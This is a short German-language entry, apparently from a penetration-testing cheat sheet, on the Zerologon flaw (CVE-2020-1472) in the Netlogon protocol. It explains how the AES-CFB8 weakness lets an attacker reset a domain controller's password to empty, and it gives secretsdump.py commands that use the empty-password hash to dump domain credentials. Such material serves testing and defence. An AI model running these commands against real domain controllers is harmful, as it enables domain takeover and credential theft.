
[CVE-2020-1472] Netlogon Remote Protocol Call (MS-NRPC) Privilegieneskalation (Zerologon)
[CVE-2020-1472] Netlogon-Remoteprotokollaufruf (MS-NRPC) Privilegieneskalation (Zerologon)
Der hier beschriebene Angriff nutzt Schwachstellen in einem kryptografischen Authentifizierungsprotokoll (unsichere Verwendung von AES-CFB8), das die Authentizität und Identität eines in die Domäne eingebundenen Computers gegenüber dem Domänencontroller (DC) nachweist. Durch die falsche Verwendung eines AES-Betriebsmodus ist es möglich, die Identität eines beliebigen Computerkontos (einschließlich der des DC selbst) zu fälschen und für dieses Konto in der Domäne ein leeres Passwort festzulegen (einfach durch Senden einer Reihe von Netlogon-Nachrichten, bei denen verschiedene Felder mit Nullen gefüllt sind). Dies kann dann genutzt werden, um Anmeldedaten des Domänenadministrators zu erhalten und anschließend das ursprüngliche DC-Passwort wiederherzustellen.
So prüfen Sie CVE-2020-1472
So nutzen Sie CVE-2020-1472 aus
Führen Sie dann einen der folgenden Befehle aus
Beispielformat 1: python secretsdump.py domain/example-dc$@fqdn-of-dc
./secretsdump.py zerologon.local/DC01\[email protected] -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 -just-dc
Beispielformat 2: python secretsdump.py domain/example-dc$@ip-of-dc
./secretsdump.py zerologon.local/DC01\[email protected] -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 -just-dc

Der ursprüngliche Blogbeitrag ist hier verfügbar
Das ursprüngliche Repository, das das Python-Testskript enthält, ist hier verfügbar
Das ursprüngliche Repository, das das Python-Exploit-Skript enthält, ist hier verfügbar